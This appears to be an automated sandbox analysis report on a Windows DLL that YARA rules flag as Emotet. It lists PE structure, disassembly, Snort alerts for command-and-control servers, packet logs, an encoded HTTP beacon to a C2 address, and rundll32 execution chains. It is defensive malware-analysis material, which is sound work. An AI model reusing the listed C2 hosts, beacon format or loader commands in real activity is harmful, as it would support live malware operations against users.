                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:kKvdEfzk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:nGfz9kPlE99SNxAhUeYlUSA/t
                                                                                                          MD5:5428C598E593776DFD9C879BAF45E38D
                                                                                                          SHA1:440920BFABC63CCBB59AC0457FACCAFA2C40A2B2
                                                                                                          SHA-256:C5EBF4F0C778797EB7812BFCD020FB870564F9DF859E4E541EB8706203F01C4A
                                                                                                          SHA-512:6EF6AA85E1A7EC6DC87DA2EA74544F0AAC3954B9A66CA42471F0C9052BAB17B59251E5AD65BE2EA672D367A85705C20738DB103AF6CDAB61EE3A46CEE539F0B0
                                                                                                          Malicious:false
                                                                                                          Preview: p...... ...........\....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55
                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                          Malicious:false
                                                                                                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):5.4287905510522645
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.40%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.21%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          File name:qrb6jVwzoe.dll
                                                                                                          File size:425984
                                                                                                          MD5:56547488fb182b73f83211903ce2dd30
                                                                                                          SHA1:e3c962932fb99e7685ea989356d60afc4045c52f
                                                                                                          SHA256:bf0cadbc8a6b28a54eb0db5f2afe582a02d5f1dedb058097abc1d7b43ba7deb0
                                                                                                          SHA512:f1d4ae06426e597af23e21d97946812d9bb7d546687cd53b8efec73a82216f998e9c4f7556cf6791aa1b3d32787c57056777a3bde6563ac5b7b51b48f0455dce
                                                                                                          SSDEEP:6144:1ACzUEcRRKxe0DUAldEzpLcE0sepO8+wM:1lxemHQtcE0sLvd
                                                                                                          File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....A.a...........!.....T...P.......................................................H....@..........................S..P..

                                                                                                          File Icon

                                                                                                          Icon Hash:64da98ecd2ceead4

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x1001cab0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x10000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0x619E410C [Wed Nov 24 13:41:32 2021 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:ef559179cbfc08fc57c1e24c241992ea

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                                          jne 00007FED612600A7h
                                                                                                          call 00007FED61260107h
                                                                                                          push dword ptr [ebp+10h]
                                                                                                          push dword ptr [ebp+0Ch]
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007FED6125FF58h
                                                                                                          add esp, 0Ch
                                                                                                          pop ebp
                                                                                                          retn 000Ch
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          sub esp, 14h
                                                                                                          and dword ptr [ebp-0Ch], 00000000h
                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                          and dword ptr [ebp-08h], 00000000h
                                                                                                          push eax
                                                                                                          call dword ptr [1002806Ch]
                                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                                          xor eax, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                          call dword ptr [10028068h]
                                                                                                          xor dword ptr [ebp-04h], eax
                                                                                                          call dword ptr [10028050h]
                                                                                                          xor dword ptr [ebp-04h], eax
                                                                                                          lea eax, dword ptr [ebp-14h]
                                                                                                          push eax
                                                                                                          call dword ptr [10028064h]
                                                                                                          mov eax, dword ptr [ebp-10h]
                                                                                                          lea ecx, dword ptr [ebp-04h]
                                                                                                          xor eax, dword ptr [ebp-14h]
                                                                                                          xor eax, dword ptr [ebp-04h]
                                                                                                          xor eax, ecx
                                                                                                          leave
                                                                                                          ret
                                                                                                          mov ecx, dword ptr [1004609Ch]
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          mov edi, BB40E64Eh
                                                                                                          mov esi, FFFF0000h
                                                                                                          cmp ecx, edi
                                                                                                          je 00007FED612600A6h
                                                                                                          test esi, ecx
                                                                                                          jne 00007FED612600C8h
                                                                                                          call 00007FED61260039h
                                                                                                          mov ecx, eax
                                                                                                          cmp ecx, edi
                                                                                                          jne 00007FED612600A9h
                                                                                                          mov ecx, BB40E64Fh
                                                                                                          jmp 00007FED612600B0h
                                                                                                          test esi, ecx
                                                                                                          jne 00007FED612600ACh
                                                                                                          or eax, 00004711h
                                                                                                          shl eax, 10h
                                                                                                          or ecx, eax
                                                                                                          mov dword ptr [1004609Ch], ecx
                                                                                                          not ecx
                                                                                                          pop edi
                                                                                                          mov dword ptr [10046098h], ecx
                                                                                                          pop esi
                                                                                                          ret
                                                                                                          push 1005E118h
                                                                                                          call dword ptr [10028070h]
                                                                                                          ret

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x453000x50.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x453500x28.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000xb7b8.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x6d0000x10f0.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x44be00x38.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44c180x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x280000x124.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .flat0x10000x4460x600False0.643229166667data5.67523607022IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .text0x20000x252cb0x25400False0.536086933725data5.88986915783IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x280000x1d9da0x1da00False0.494923523207data5.10028459369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x460000x1aab00x17e00False0.51547161322data4.96853823593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x610000xb7b80xb800False0.177564538043data3.89759299523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x6d0000x10f00x1200False0.782335069444data6.41113333729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_ICON0x614b00xb13PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia
                                                                                                          RT_ICON0x61fc80xea8dataRussianRussia
                                                                                                          RT_ICON0x62e700x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0RussianRussia
                                                                                                          RT_ICON0x637180x568GLS_BINARY_LSB_FIRSTRussianRussia
                                                                                                          RT_ICON0x63c800xc4aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia
                                                                                                          RT_ICON0x648d00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 61695, next used block 4294934272RussianRussia
                                                                                                          RT_ICON0x68af80x25a8dataRussianRussia
                                                                                                          RT_ICON0x6b0a00x10a8dataRussianRussia
                                                                                                          RT_ICON0x6c1480x468GLS_BINARY_LSB_FIRSTRussianRussia
                                                                                                          RT_GROUP_ICON0x6c5b00x84dataRussianRussia
                                                                                                          RT_VERSION0x612b00x200dataRussianRussia
                                                                                                          RT_MANIFEST0x6c6380x17dXML 1.0 document textEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllInterlockedFlushSList, GetProcessHeap, HeapAlloc, HeapFree, GetLastError, GetCommandLineA, ExitProcess, GetModuleHandleA, GetProcAddress, CloseHandle, TerminateProcess, WaitForSingleObject, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, FreeLibrary, IsBadReadPtr, GetCurrentProcessId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, DecodePointer, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, RaiseException, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, GetStringTypeW, HeapSize, CreateFileW

                                                                                                          Exports

                                                                                                          NameOrdinalAddress
                                                                                                          Control_RunDLL10x1000209d

                                                                                                          Version Infos

                                                                                                          DescriptionData
                                                                                                          LegalCopyrightCopyright (C) 2021
                                                                                                          ProductVersion1.0.0.1
                                                                                                          FileDescriptionApplication
                                                                                                          FileVersion1.0.0.1
                                                                                                          CompanyNameA company
                                                                                                          Translation0x0419 0x04b0

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          RussianRussia
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          11/24/21-16:49:09.812890TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 1849755443192.168.2.651.178.61.60
                                                                                                          11/24/21-16:49:10.518553TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 74975680192.168.2.6168.197.250.14
                                                                                                          11/24/21-16:49:12.373719TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 17497578080192.168.2.645.79.33.48
                                                                                                          11/24/21-16:49:33.450645TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 12497608080192.168.2.6196.44.98.190
                                                                                                          11/24/21-16:49:54.536525TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 8497837080192.168.2.6177.72.80.14
                                                                                                          11/24/21-16:49:55.088956TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)708049783177.72.80.14192.168.2.6

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 24, 2021 16:49:09.812890053 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:09.812928915 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:09.813005924 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:09.837883949 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:09.837908983 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:09.956489086 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:09.956604004 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.298460007 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.298489094 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.298830032 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.298909903 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.306252003 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.348871946 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.406735897 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.406831980 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.406847954 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.406882048 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.406909943 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.406945944 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.436374903 CET49755443192.168.2.651.178.61.60
                                                                                                          Nov 24, 2021 16:49:10.436402082 CET4434975551.178.61.60192.168.2.6
                                                                                                          Nov 24, 2021 16:49:10.518553019 CET4975680192.168.2.6168.197.250.14
                                                                                                          Nov 24, 2021 16:49:10.789995909 CET8049756168.197.250.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:11.309665918 CET4975680192.168.2.6168.197.250.14
                                                                                                          Nov 24, 2021 16:49:11.581053972 CET8049756168.197.250.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:12.090867043 CET4975680192.168.2.6168.197.250.14
                                                                                                          Nov 24, 2021 16:49:12.362139940 CET8049756168.197.250.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:12.373718977 CET497578080192.168.2.645.79.33.48
                                                                                                          Nov 24, 2021 16:49:15.388072014 CET497578080192.168.2.645.79.33.48
                                                                                                          Nov 24, 2021 16:49:21.390383959 CET497578080192.168.2.645.79.33.48
                                                                                                          Nov 24, 2021 16:49:33.450644970 CET497608080192.168.2.6196.44.98.190
                                                                                                          Nov 24, 2021 16:49:36.452322006 CET497608080192.168.2.6196.44.98.190
                                                                                                          Nov 24, 2021 16:49:42.468460083 CET497608080192.168.2.6196.44.98.190
                                                                                                          Nov 24, 2021 16:49:54.536525011 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:54.785692930 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:54.786612988 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:54.786643028 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:55.035741091 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:55.088956118 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:55.088983059 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:55.089173079 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:56.942157984 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:57.191248894 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:57.192994118 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:57.197318077 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:57.197981119 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:49:57.487085104 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:58.586780071 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:49:58.587002039 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:50:01.587296009 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:50:01.587367058 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:50:01.587383032 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:50:01.587440014 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:50:59.695960045 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:50:59.696007013 CET497837080192.168.2.6177.72.80.14
                                                                                                          Nov 24, 2021 16:50:59.946142912 CET708049783177.72.80.14192.168.2.6
                                                                                                          Nov 24, 2021 16:50:59.946266890 CET497837080192.168.2.6177.72.80.14

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • 51.178.61.60

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.64975551.178.61.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-11-24 15:49:10 UTC0OUTGET /BCcDzRknSjFPjuOxHLZvVqcO HTTP/1.1
                                                                                                          Cookie: QMpLEjjFd=c4U8GYO3gBQ2KCd18VNTs9PT8hpdVNqj4zLzgZE1fFI9x0SPtcMipNFNESf8CsAVem5JWMqQ8ndGaJ1DdBO6E5KdfcNjE1YapLmU92FtgBNQbP19LEuO+ya4SHRYKzrZSycrfZTK0DPGNQZNeJ6j1cioezM7bzeTQ/thQoUAbkNL0mgdSgnH4s5+Omur7YLxQg0NgsR41aDxprzsQzXD6m2hLQv3kzo0+dQAtysUr4iTrR26F9NeGzF2zkgnUERUJbSQGPdy5NBtzT8NJyvrR6k15te4INQfbmWwqTBzGbEzsQ==
                                                                                                          Host: 51.178.61.60
                                                                                                          Connection: Keep-Alive
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-11-24 15:49:10 UTC0INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx
                                                                                                          Date: Wed, 24 Nov 2021 15:49:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 162
                                                                                                          Connection: close
                                                                                                          2021-11-24 15:49:10 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Start time:16:48:55
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll"
                                                                                                          Imagebase:0xd20000
                                                                                                          File size:893440 bytes
                                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:48:56
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                                                                                                          Imagebase:0x2a0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:48:56
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                                                                                                          Imagebase:0x1180000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:48:56
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
                                                                                                          Imagebase:0x1180000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:48:56
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
                                                                                                          Imagebase:0x1180000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:48:57
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL
                                                                                                          Imagebase:0x1180000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000003.359302351.0000000000C16000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.361400733.0000000000BDA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:48:59
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan
                                                                                                          Imagebase:0x1180000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.365562801.0000000000F66000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:49:00
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL
                                                                                                          Imagebase:0x1180000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.382797966.0000000003233000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.877277824.0000000003233000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:49:03
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff6b7590000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:49:19
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff6b7590000
                                                                                                          File size:51288 bytes
